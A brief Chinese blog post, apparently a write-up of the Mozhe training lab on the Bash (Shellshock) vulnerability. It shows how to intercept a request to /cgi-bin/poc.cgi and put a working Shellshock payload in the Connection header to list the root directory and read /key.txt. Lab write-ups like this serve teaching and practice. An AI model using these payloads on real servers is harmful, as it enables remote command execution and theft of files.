墨者Bash漏洞分析溯源

发表于2024-07-29|更新于2024-07-29

|阅读量:

墨者Bash漏洞分析溯源

打开题目环境

Bash漏洞存在的路径多数在网页/cgi-bin/下，打开此网页。

1	http://url/cgi-bin/poc.cgi

此漏洞是存在的，使用bp抓包

把在下面的Connection的参数，改成我们的执行代码。

1	Connection: () { :;}; echo; /bin/ls /

继续执行我们的命令看key.txt

1	Connection: () { :;}; echo; /bin/cat /key.txt

问题解决

文章作者: lwj

文章链接: https://blog.mikuuu.icu/2024/07/29/%E5%A2%A8%E8%80%85Bash%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E6%BA%AF%E6%BA%90/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Luo 666！

相关推荐

RCE绕过方法

python pickle中的反序列化漏洞学习复现题目

暑期训练第一周